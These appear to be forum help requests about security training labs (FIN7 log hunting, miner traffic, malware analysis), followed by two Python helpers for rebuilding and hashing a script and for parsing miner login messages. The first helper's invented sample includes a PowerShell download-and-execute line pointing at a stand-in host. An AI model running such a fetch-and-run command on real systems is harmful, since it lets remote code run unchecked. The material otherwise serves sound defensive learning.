Introduction to Detection Engineering: Ep.5 – Custom Alerting
Struggling to get the token for this one. Got the Python script working (I think?) - it's generating alerts into Elastic, without replaying duplicates. But I get the select LatMov events - then wait and wait - before eventually getting:

@timestamp: <actual timestamp here>
alert_message: Not all instances of lateral movement detected. Please restart the lab to try again.
_id: 7qvVgpMBEQ2Wr4UXppEV
_index: custom_alert_index
_score: -

Sometimes I don't even get that, just a handful of events, then the lab expires. Is there any more detailed guidance on this lab? Feels like the guidance was written at 4:59pm on a Friday, if you know what I mean 😂

Also a bit confused: the guidance says play around with the sleep() function, as it describes the "WAIT_TIME_MINUTES" - fairly sure it's actually seconds? Unless IL have written their own custom 'time' module?

Events & Breaches: Magecart Skimmer
Hello - I need a hand locating the domain (Q7). I've found the name of the file that contains the skimmer, then exported it. I then opened that in a text editor and searched for "http://" and "https://" in the big chunk of text, but nothing is matching.

Malware Analysis: Tracking a LOLBins Campaign – Examination
I have completed all of the questions within this lab except for question 7 and question 13. Both of these questions appear to have something to do with execution of the 1st and 2nd downloaded files in the lab. I have successfully completed the deobfuscation of each file, but I cannot seem to execute the appropriate step(s) or action(s) to get to the correct answers for these last 2 questions. Any insight or guidance on what I'm missing / doing incorrectly and how to correct it would be greatly appreciated. I have provided a few screenshots for reference. Thanks in advance.

CVE-2022-29799/CVE-2022-29800 (Nimbuspwn) – Defensive
Hello community, I can't find the answer to these questions. I tried using the Sigma file provided in the lab to query Splunk; it returned no events. I also tried doing custom queries using similar strings, but I never got the correct answers. Any help is appreciated. Thanks

Foundational Static Analysis: Analyzing Structures
The question is asking me "In the disassembly at address 00401567, what is the structure EDX is pointing to? Look at Microsoft Docs for help!" At the very end of the briefing they go over the explanation of how to identify which offset is determining which call. I am 90% positive that the offset we are supposed to be identifying in this case is 0x17c. However, within this SAME blurb, while they are explaining the way the stack lines up, they simply identify which API the offset in their example is pointing to. THEY NEVER MENTION HOW THEY GOT THERE! I am sure that it requires some research and I have been trying to identify anything within the MSDN database, but I can't find a single clue how to identify what API 0x17c is pointing to. I have even tried looking up references for the offset they had, 0x138, which they identified as STARTUPINFO. (I googled both terms together.) Now I am most definitely missing something here. A step within the assembly analysis, maybe, but I am at a loss. If anyone could help me out I would appreciate it.

Malicious Document Analysis: Dropper Analysis
I have completed up to question 6 on here and I cannot get the Python script to work. I have gone through and "fixed" the required portions but keep getting "ModuleNotFoundError: No module named 'oletools'". Any pointers on what I'm doing wrong and how to fix it would be appreciated.

FIN7 Threat Hunting with Splunk: Ep.3 – Execution Logs
For this lab I need to rebuild the PowerShell script using the three parts found in the PowerShell operational logs, which I am able to do fairly easily, but when I am required to obtain the MD5 hash of the file I am not getting the correct hash. I've removed any trailing white spaces and return characters. No matter the setup, I just can't seem to find the special sauce on this one. I've tried numerous approaches and still get a no-go. Any tips?

Help needed for Threat Hunting: Mining Behaviour
Hey everyone! I need some help with the last question of a lab. I have already identified the JSON authentication token and the packet that holds it. But within that packet, I just can't find the authentication key that identifies the miner. Was anyone able to solve this and help? Thanks!
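On the FIN7 execution-logs question above (rebuilding a script from three PowerShell operational log fragments and hashing it): when the content is right but the MD5 is wrong, the difference is almost always in the bytes around the text rather than the text itself, that is, CRLF versus LF line endings, a trailing newline, a UTF-8 or UTF-16 byte-order mark, or the file having been saved as UTF-16 at all. The following is an added example, not code from the lab or from the poster; the three fragments are invented. It rebuilds the same fragments under each of those byte-level variants, hashes each one, and reports which variant matches a target hash, so you can check every candidate in one go instead of re-saving the file by hand.

```python
import hashlib

# Constructed sample fragments, standing in for the three parts recovered
# from the operational logs (invented content, not the lab's script).
FRAGMENTS = [
    "$u = 'http://example.invalid/payload'\r\n",
    "$c = New-Object Net.WebClient\r\n",
    "$c.DownloadString($u) | IEX\r\n",
]


def md5_hex(data: bytes) -> str:
    """MD5 of raw bytes as a lowercase hex string."""
    return hashlib.md5(data).hexdigest()


def rebuild(fragments, newline="\r\n", bom=False, strip_trailing=False,
            encoding="utf-8") -> bytes:
    """Join the fragments and produce the exact bytes under one set of
    line-ending / BOM / encoding choices."""
    text = "".join(fragments)
    # Normalise whatever line endings the fragments had, then apply the requested one.
    text = text.replace("\r\n", "\n").replace("\n", newline)
    if strip_trailing:
        text = text.rstrip("\r\n")
    data = text.encode(encoding)
    if bom:
        # UTF-8 BOM; an editor saving as "UTF-16 LE" would prepend FF FE instead.
        data = b"\xef\xbb\xbf" + data
    return data


def hash_variants(fragments) -> dict:
    """MD5 of every byte-level variant a practitioner is likely to have produced."""
    variants = {
        "crlf": rebuild(fragments, "\r\n"),
        "crlf_no_trailing": rebuild(fragments, "\r\n", strip_trailing=True),
        "lf": rebuild(fragments, "\n"),
        "lf_no_trailing": rebuild(fragments, "\n", strip_trailing=True),
        "crlf_utf8_bom": rebuild(fragments, "\r\n", bom=True),
        "crlf_utf16le": rebuild(fragments, "\r\n", encoding="utf-16-le"),
        "crlf_utf16le_bom": b"\xff\xfe" + rebuild(fragments, "\r\n", encoding="utf-16-le"),
    }
    return {name: md5_hex(data) for name, data in variants.items()}


def match_hash(fragments, target_md5: str):
    """Name the variant whose MD5 equals target_md5 (case-insensitive), or None."""
    target = target_md5.strip().lower()
    for name, digest in hash_variants(fragments).items():
        if digest == target:
            return name
    return None


if __name__ == "__main__":
    for name, digest in hash_variants(FRAGMENTS).items():
        print(f"{name:18} {digest}")
```

Two caveats worth knowing when the file is written from PowerShell itself: in Windows PowerShell 5.1, Out-File defaults to UTF-16 LE with a BOM while Set-Content defaults to the system ANSI code page, whereas PowerShell 7 defaults both to UTF-8 without a BOM. So the same three lines can yield three different MD5s depending on which cmdlet and which PowerShell version wrote them; compare with Get-FileHash -Algorithm MD5 (or md5sum) on the saved file, not on a string you hashed in memory.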
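For the Mining Behaviour question above: the credential a miner presents is carried in the first JSON-RPC message it sends to the pool over Stratum. It is either a `login` call whose `params` object holds `login` and `pass` fields (the XMRig-style JSON-RPC dialect) or a `mining.authorize` call whose `params` list is `[username, password]` (Stratum v1), and by pool convention the username is `wallet.worker`. The following is an added example, not from the lab or the poster; the two payloads are constructed to look like a miner's first TCP segments and the wallet strings are made up. It reassembles the newline-delimited stream, tolerates a truncated or non-JSON line, and returns the identifier from whichever authorisation form it finds.

```python
import json

# Constructed payloads (not lab data): the newline-delimited JSON-RPC a miner
# sends in its first TCP segments. Reassemble the client side of the stream
# first (e.g. Wireshark "Follow TCP Stream"), because one JSON message can
# straddle two packets and a single packet may hold several messages.
XMRIG_STYLE = (
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4ABCDexamplewallet.rig01",'
    b'"pass":"x","agent":"XMRig/6.21.0","algo":["rx/0"]}}\n'
    b'{"id":1,"jsonrpc":"2.0","result":{"id":"a1b2c3","status":"OK"},"error":null}\n'
)
STRATUM_V1 = (
    b'{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.1"]}\n'
    b'{"id":2,"method":"mining.authorize","params":["bc1qexamplewallet.worker7","x"]}\n'
)


def iter_json_messages(payload: bytes):
    """Yield each complete JSON value from a newline-delimited byte stream."""
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated segment or non-JSON noise: skip it


def extract_miner_identity(payload: bytes):
    """Return (method, identifier, password) from the miner's auth message, or None."""
    for msg in iter_json_messages(payload):
        if not isinstance(msg, dict):
            continue
        method, params = msg.get("method"), msg.get("params")
        if method == "login" and isinstance(params, dict):
            # XMRig-style JSON-RPC: credentials are fields of a params object.
            return method, params.get("login"), params.get("pass")
        if method == "mining.authorize" and isinstance(params, list) and params:
            # Stratum v1: params is [username, password].
            password = params[1] if len(params) > 1 else None
            return method, params[0], password
    return None


def split_worker(identifier: str):
    """Split the pool convention wallet.worker into (wallet, worker or None)."""
    wallet, sep, worker = identifier.partition(".")
    return wallet, (worker if sep else None)


if __name__ == "__main__":
    for name, payload in (("xmrig-style", XMRIG_STYLE), ("stratum-v1", STRATUM_V1)):
        found = extract_miner_identity(payload)
        print(name, found, split_worker(found[1]) if found else None)
```

When hunting this in a pcap, filter on the miner's outbound TCP stream rather than the pool's replies: the pool's `result` messages carry a session id and jobs, not the credential, so searching the wrong direction of the conversation is the usual reason the key "isn't in the packet".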